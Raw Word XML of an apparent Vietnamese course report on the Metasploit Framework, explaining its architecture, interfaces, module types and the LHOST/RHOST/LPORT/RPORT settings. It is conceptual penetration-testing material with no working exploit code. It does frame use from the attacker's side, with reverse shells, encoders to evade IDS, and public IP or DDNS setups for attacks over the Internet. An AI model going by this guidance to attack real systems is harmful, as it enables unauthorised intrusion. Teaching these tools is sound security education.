          <w:numId w:val="10"/>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Datastore: được hiểu như một môi trường, nó bao gồm một giá trị băm có thể được sử dụng bởi các modun tham chiếu đến các chương trình hay bằng các giá trị điều khiển. Biến môi trường là một trong những giá trị như vậy, nó được sử dụng bởi các modun khai thác hay bởi các framework để xác định chính xác các hành vi được thực hiện.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2FAF6A" w14:textId="740F511D" w:rsidR="00EC5E48" w:rsidRPr="00C73388" w:rsidRDefault="00EC5E48" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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Event Notification (thông báo sự kiện): cho phép các nhà phát triển đưa ra các hành động cụ thể với sự kiện ay hành động xảy ra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F473E8" w14:textId="49569C76" w:rsidR="00EC5E48" w:rsidRDefault="00EC5E48" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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Framework Managers: có nhiệm vụ quản lý các modun, plugin, sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58836551" w14:textId="77777777" w:rsidR="00C73388" w:rsidRPr="00C73388" w:rsidRDefault="00C73388" w:rsidP="00C73388">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:left="1292"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B3C342" w14:textId="218E521C" w:rsidR="00EC5E48" w:rsidRPr="00C73388" w:rsidRDefault="00EC5E48" w:rsidP="00EC5E48">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3.1.3. Framework Base (khung cơ sở):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAA410C" w14:textId="18505B74" w:rsidR="00EC5E48" w:rsidRPr="00C73388" w:rsidRDefault="00EC5E48" w:rsidP="00EC5E48">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Được xây dựng dựa trên khuôn khổ của khung lõi, cung cấp giao fieenj có thể dễ dàng thực thi các lõi. Một số khung cơ sở:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CAEF70" w14:textId="444C158E" w:rsidR="00EC5E48" w:rsidRPr="00C73388" w:rsidRDefault="008E1D83" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Configuration: duy trì một cấu hình liên tục và thu nhập thông tin về cấu trúc của tiến trình cài đặt chẳng hạn như thư mục gốc của quá trình cài đặt hay các thuộc tính khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CF99CC" w14:textId="1188A496" w:rsidR="008E1D83" w:rsidRPr="00C73388" w:rsidRDefault="008E1D83" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Sesions: những thông tin cơ bản về việc duy trì, kiểm soát các hành vi trong phiên làm việc của người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4711D0EB" w14:textId="149D6CCE" w:rsidR="008E1D83" w:rsidRPr="00C73388" w:rsidRDefault="008E1D83" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:num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 xml:space="preserve">Logging: là một tiện ích </w:t>
      </w:r>
      <w:r w:rsidR="008E7B61" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>của MSF cho phép ghi lại các thông tin, các lỗi, gỡ lỗi một cách tổng quát và linh hoạt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457BFE04" w14:textId="40CCBB17" w:rsidR="003C1E1D" w:rsidRPr="00C73388" w:rsidRDefault="003C1E1D"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4690EE91" w14:textId="411CF8D5" w:rsidR="00CC78A3" w:rsidRPr="00C73388" w:rsidRDefault="00FC5CF9"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w:t>
      </w:r>
      <w:r w:rsidR="00E20705" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Các t</w:t>
      </w:r>
      <w:r w:rsidR="00CA2D0B" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>hành phần</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAB6560" w14:textId="2B9725FA" w:rsidR="00E20705" w:rsidRPr="00C73388" w:rsidRDefault="00E20705"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1</w:t>
      </w:r>
      <w:r w:rsidR="007C788F" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>. Hỗ trợ giao diện người dùng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE4B873" w14:textId="77777777" w:rsidR="007C788F" w:rsidRPr="00C73388" w:rsidRDefault="007C788F" w:rsidP="007C788F">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Console interface: Đây là giao diện sử dụng các dòng lệnh để cấu hình, kiểm tra do vậy tốc độ nhanh hơn và mềm dẻo hơn. Sử dụng file msfconsole.bat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D84E8BF"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7EE1C079" w14:textId="77777777" w:rsidR="007C788F" w:rsidRPr="00C73388" w:rsidRDefault="007C788F" w:rsidP="007C788F">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Web interface: Giao tiếp với người dùng thông qua giao diện web. Sử dụng file msfweb.bat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A1E109" w14:textId="7D58FB5B" w:rsidR="007C788F" w:rsidRPr="00C73388" w:rsidRDefault="007C788F" w:rsidP="007C788F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1600"/>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6098A3D6" w14:textId="2EED9E77" w:rsidR="007C788F" w:rsidRPr="00C73388" w:rsidRDefault="007C788F"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2. Environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9779CE" w14:textId="77777777" w:rsidR="007C788F" w:rsidRPr="00C73388" w:rsidRDefault="007C788F" w:rsidP="007C788F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
          <w:tab w:val="left" w:pos="709"/>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Global Environment: Được thực thi thông qua 2 câu lệnh setg và unsetg, những tùy chọn được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542899BE"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349EF9EC" w14:textId="77777777" w:rsidR="007C788F" w:rsidRPr="00C73388" w:rsidRDefault="007C788F" w:rsidP="007C788F">
      <w:pPr>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Temporary Environment: Được thực thi thông qua 2 câu lệnh set và unset, environment này chỉ được đưa vào module khai thác đang load hiện tại, không ảnh hưởng đến các module khai thác khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E69BCA" w14:textId="77777777" w:rsidR="007C788F" w:rsidRPr="00C73388" w:rsidRDefault="007C788F" w:rsidP="007C788F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="749AD110" w14:textId="16F3720C" w:rsidR="00E20705" w:rsidRPr="00C73388" w:rsidRDefault="007C788F" w:rsidP="007C788F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>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Những thành phần nào có cấu hình giống nhau giữa các exploits module như là: LPORT, LHOST, PAYLOAD thì bạn nên cấu hình ở chế độ ở Global Environment để không phải cấu hình lại nhiều lần.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582E5687" w14:textId="77777777" w:rsidR="008B5575" w:rsidRPr="00C73388" w:rsidRDefault="008B5575" w:rsidP="00F13896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F822895" w14:textId="7E3368F4" w:rsidR="00F13896" w:rsidRPr="00C73388" w:rsidRDefault="00F13896" w:rsidP="00F13896">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3. Các Module trong framework:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4F45BE" w14:textId="77777777" w:rsidR="00F13896" w:rsidRPr="00C73388" w:rsidRDefault="00F13896" w:rsidP="00F13896">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13787F91" w14:textId="140DADEB" w:rsidR="008360AA" w:rsidRPr="00C73388" w:rsidRDefault="00F13896"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r w:rsidR="008360AA" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Exploits: là một phần của phần mềm, một đoạn dữ liệu, hoặc chuỗi các lệnh màlợi dụng một lỗi, lỗi hoặc lỗ hổng để gây ra hành vi không mong muốnhoặc không mong muốn xảy ra trên phần mềm máy tính, phần cứng, hoặc một cái gì đóthuộc điện tử (thường trên máy vi tính). Điều này thường bao gồm những thứ như giành quyền kiểm soát của một hệ thống máy tính hoặc cho phép nâng quyền hay một tấn công từ chối dịch vụ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5729E286"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154E5E2A" w14:textId="5E611311" w:rsidR="00F13896"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Payloads: là các phần của code được thực thi trên hệthống đích như một phần của</w:t>
      </w:r>
      <w:r w:rsidR="005B2D62">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nỗ lực khai thác.</w:t>
      </w:r>
      <w:r w:rsidR="005B2D62">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload là một đoạn mã được xây dựng để hệ thống thực thi. Các Payload này được lựa chọn và cung cấp bởi Framwork. Một revesrse shell là một payload, nó tạo ra một kết nói từ máy nạn nhân tới máy của kẻ tấn công, kẻ tấn công có thể lắng nghe về máy tính nạn nhân thông qua cổng kết nối. Một payload cũng có thể được hiểu đơn giản là một số câu lệnh được thực hiện trên hệ điều hành của máy nạn nhân. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5C7604" w14:textId="0C456C86" w:rsidR="005B2D62" w:rsidRPr="00C73388" w:rsidRDefault="005B2D62"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7CE41999"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55B70A80" w14:textId="27131092"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4. Các loại payload Metasploit cung cấp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D254A77" w14:textId="486A937D" w:rsidR="005B2D62"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Lệnh Shell: cho phép người dùng chạy các kịch bản bộ sưu tập hoặc chạy các lệnh tùy ýđối với máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9E974B" w14:textId="34599AAD" w:rsidR="005B2D62" w:rsidRPr="00C73388" w:rsidRDefault="005B2D62"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0206F6F9" w14:textId="686E74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Meterpreter cho phép người dùng điều khiển màn hình của thiết bị bằng cách sử dụngVNC và để trình duyệt tải lên và tải về tập tin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BED8FCC"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41E29D3D" w14:textId="4B356BF0"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NOP Generators: Thông thường, các vị trí chính xác của jump có thểkhông được biết đến,</w:t>
      </w:r>
      <w:r w:rsidR="006E4853"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và các NOP cầnđược đưa vào trước để khai thác thực tế. Để tránh IDSes từ việc kích hoạttrên các mẫu lưu lượng truy cập, Các NOP Genergator cho phép làm bối rối các trình tự của NOPhoặc NOP sleds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6399C564"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r>
    </w:p>
    <w:p w14:paraId="2DF41EB9" w14:textId="7030853F"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Encoders: Cũng giống như NOP sleds hayPayloadsđều có thể kích hoạt được IDS signatures. Các Encoders còn có thểthể tránh được bằng cách mã hóa các payload, vì vậy mà chúng vượt qua mà không bị phát hiện qua mạng, được giải mã vào mụctiêu, và thực hiện theo kế hoạch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F9D30D" w14:textId="77777777"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216F7B38" w14:textId="60843EE4" w:rsidR="008360AA" w:rsidRPr="00C73388" w:rsidRDefault="008360AA" w:rsidP="008360AA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>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ab/>
        <w:t>Auxiliary Modules: cung cấp chức năng tăng cường cho các thử nghiệm xâm nhập về</w:t>
      </w:r>
      <w:r w:rsidR="006A50CC"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vân tay và quét</w:t>
      </w:r>
      <w:r w:rsidR="009C6235" w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>lỗ hổng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5FBF09" w14:textId="77777777" w:rsidR="008360AA" w:rsidRDefault="008360AA" w:rsidP="008360AA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BA8F415" w14:textId="1D633976"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II.5. Giao diện của Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A02DD3" w14:textId="05EA6E08"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etasploit cung cấp cho chúng ta nhiều hơn một giao diện để thực hiện các chức năng cơ bản của nó. Giao diện của Metasploit bao gồm cả giao diện điều khiển, dòng lênh hay đồ hoạ. Ngoài ra, các giao diện hay tiện ích của Metasploit Framework thường được cung cấp trực tiếp thông qua các hàm chức năng. Những tiện ích này có thể rất hữu dụngcho việc phát hiện khai thác các lỗ hổng của hệ thống mà không cần sử dụng toàn bộ Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50271200" w14:textId="77777777"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p>
    <w:p w14:paraId="63A713C5" w14:textId="40EFAFF8" w:rsidR="00F96CAC" w:rsidRDefault="00F96CAC"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sfconsole đến này được xem là môi trường làm việc phổ biến của Metasploit Framework vì nó được đánh giá cao. Đây là môi trường làm việc linh hoạt với nhiều tính năng phong phú, khả năng cung cấp các công cụ hỗ trợ hữu dụng cho quá trình khai thác.</w:t>
      </w:r>
      <w:r w:rsidR="00A11310">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BCB66A" w14:textId="77777777" w:rsidR="00A11310" w:rsidRDefault="00A11310" w:rsidP="008360AA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47AEDBD8" w14:textId="6F3EE7F5" w:rsidR="00A11310" w:rsidRDefault="00A11310" w:rsidP="008360A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Msfconsole có những lợi ích sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE4EC02" w14:textId="551CB7F2"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Msfconsole là cách duy nhất để truy cập vào hỗ trợ hầu hết các tính năng trong Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F43BFAA" w14:textId="463E8793"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Msfconsole cung cấp tất cả trong một giao diện, hầu hết các tuỳ chọn và thiết lập có sẵn trong Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E3DB01" w14:textId="19249AE6"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Có hầu hết các tính năng và ổn định nhất.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373C2357" w14:textId="09918D98" w:rsid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Hỗ trợ lệnh đầy đủ và tính năng tự hoàn thiệnlệnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA84CA8" w14:textId="0813E99F" w:rsidR="00A11310" w:rsidRPr="00A11310" w:rsidRDefault="00A11310" w:rsidP="00A11310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="349"/>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Thực hiện các lệnh mở rộng bên trong Msfconsole: ping, map…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDD0FBA" w14:textId="77777777" w:rsidR="00126DCA" w:rsidRPr="00C73388" w:rsidRDefault="00126DCA" w:rsidP="008360AA">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68140310" w14:textId="2F906A6E" w:rsidR="00091BFD" w:rsidRDefault="00091BFD" w:rsidP="00CA2D0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C73388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>III.4. Sử dụng Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65377C58" w14:textId="77777777" w:rsidR="00B474B4" w:rsidRDefault="00B474B4" w:rsidP="00CA2D0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2362A771" w14:textId="4299AF51" w:rsidR="003D1305" w:rsidRDefault="003D1305" w:rsidP="00CA2D0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 THÂM NHẬP BẰNG METASPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE78BEC" w14:textId="4DAFD1CE" w:rsidR="003D1305" w:rsidRDefault="003D1305" w:rsidP="00CA2D0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1. </w:t>
      </w:r>
      <w:r w:rsidR="000E569E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Một số lệnh cơ bản:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566E9039" w14:textId="77777777" w:rsidR="00710B03" w:rsidRDefault="00710B03" w:rsidP="00CA2D0B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B46FC34" w14:textId="0E31D6BD" w:rsid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LHO</w:t>
      </w:r>
      <w:r w:rsidR="00231944">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ST: loacal hoast là đ</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1B92">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ịa chỉ IP của máy Hacker (Nếu tấn công ngoài Internet thì xài IP Public, hoặc DDNS của No-IP.com)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F87FE73" w14:textId="77777777"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p>
    <w:p w14:paraId="4D462B7C" w14:textId="58C19BC5" w:rsidR="00CC1B92" w:rsidRPr="00CC1B92" w:rsidRDefault="00D74692" w:rsidP="00CC1B92">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RHOST: remote host là đ</w:t>
      </w:r>
      <w:r w:rsidR="00CC1B92" w:rsidRPr="00CC1B92">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ịa chỉ IP của máy Vicitm (Nếu tấn công ngoài Internet thì xài IP Public, RHOST có thể là URL Website cũng OK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033AF394"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17FF10A9" w14:textId="16721DE9"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 xml:space="preserve">LPORT: </w:t>
      </w:r>
      <w:r w:rsidR="00D74692">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">chọn lấy cổng để Metasploit lắng nghe tín hiệu gửi về, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1B92">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Port mở ra trên máy Hacker (Nếu tấn công ngoài Internet thì bắt buộc Port đó phải mở trên Router, còn hack trong mạng LAN thì port nào cũng được)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079F2DA4"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2F2EEA5A" w14:textId="14B32F43"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 xml:space="preserve">RPORT: </w:t>
      </w:r>
      <w:r w:rsidR="00D74692">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">tương tự thì con trojan sẽ phát tín hiệu qua cổng này trên máy victim (LPORT và RPORT không nhất thiết phả giống nhau), </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC1B92">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Port trên máy victim (Khi đi khai thác lỗ hổng, tùy lỗ hổng nằm trên giao thức nào thì có các RPORT đặc thù, thực chất Metasploit sẽ tự đặt cho các bạn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A69AE4"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35E1590F" w14:textId="77777777" w:rsidR="00CC1B92" w:rsidRPr="00CC1B92" w:rsidRDefault="00CC1B92" w:rsidP="00CC1B92">
      <w:pPr>
        <w:ind w:firstLine="567"/>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PAYLOAD: Có cấu trúc như sau (tên hệ điều hành/kiểu hệ thống/kiểu tấn công/giao thức tấn công)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1290CAAE" w14:textId="77777777" w:rsidR="00CC1B92" w:rsidRDefault="00CC1B92" w:rsidP="00CC1B92">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2122708A"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Tên hệ điều hành: android hay windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41441AAD"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Kiểu hệ thống: x86 hay x64 (Nếu không biết thì bỏ qua)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC02FB1"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Kiểu tấn công: meterpreter hay shell</w:t>
      </w:r>
    </w:p>
